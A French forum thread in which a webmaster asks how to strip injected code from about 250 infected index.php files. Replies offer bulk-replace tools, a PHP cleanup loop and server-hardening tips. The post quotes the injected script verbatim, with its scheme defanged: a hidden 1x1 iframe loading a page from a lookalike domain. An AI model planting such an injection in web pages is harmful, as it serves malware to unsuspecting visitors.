Discussion :

[nouni600]

Salut à tous,

J'ai vu que avast bloqué l'accès à mes sites à cause d'un logiciel malveillant.
J'ai donc changé mes mots de passe et j'ai envoyé mes fichiers de mon serveur vers mon Pc pour faire une analyse avec Avast.

A la fin j'ai plus de 250 fichies infectés. Ce sont quasiment tous des index.php et la ligne de code ajouté est :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<!-- counter --><script language=javascript>status=location;document.write('<iframe src="h**p://analyticgoogle.com/stats/xtjsbwcvhokqdpav.php" width="1" height="1" frameborder="0"></iframe>');</script><!-- counter -->

(j'ai remplacé "tt" par "**" pour éviter de faire un lien)

Je voulais savoir si il existe un moyen d'enlever cette ligne de tous mes fichiers rapidement ou si je dois le faire manuellement fichier par fichier??
J'ai tenté une réparation avec avast mais cela ne marche pas. Remplacer tous les fichiers par les originaux me prendrait également pas mal de temps je crois.

Merci d'avance pour votre aide

[tho.feron]

Bonjour,

Pour remplacer un texte dans plusieurs fichiers, tu trouveras probablement ton bonheur sur ces sites :
http://membres.multimania.fr/mulligan/txtrpl.htm : un utilitaire pouvant tourner sur Windows
http://pwet.fr/blog/remplacer_du_tex...s_des_dossiers : sur Linux (ou autre Unix-like)

Je vous conseille quand même de réaliser un audit de sécurité pour s'assurer que la vulnérabilité ayant été utilisée pour modifier vos fichiers ne sera pas ré-exploitée.

Cordialement,
Thomas Feron de Backsmash

[Invité]

Bonjour,
Il ne faut pas rêver, il faudra nettoyer a la main et 250 fichiers c'est rien a faire !
Par contre la source de ta faille c'est autre chose.
Je te signales quelques points

1) Fais changer ton login FTP de suite
2) Contrôles que tout tes répertoires sont au moins 0755
3) Contrôles que tout tes fichiers sont au moins 0644
4) repasses en revue tes contrôles des POST GET FILES UPLOAD etc...
5) sécurises tes includes avec un jeton
6) sécurises tout Mysql y compris login a changer
7) Mets des index bloquants dans tout tes répertoires.
8) Recherches en détail tout fichier inconnu de toi !

[laurentSc]

J'imagine une solution pour le faire automatiquement :

• mettre ces fichiers sur FTP

• en PHP, les ouvrir via une boucle (et fopen pour les ouvrir)

• sur chacun, faire le remplacement (fwrite pour écrire dans le fichier)

• refermer chaque fichier (fclose), puis remettre tout sur le disque dur

[Eric2a]

Salut,

+1 Mauriser

9) Scanner ton PC (et pas uniquement les fichiers provenant du serveur).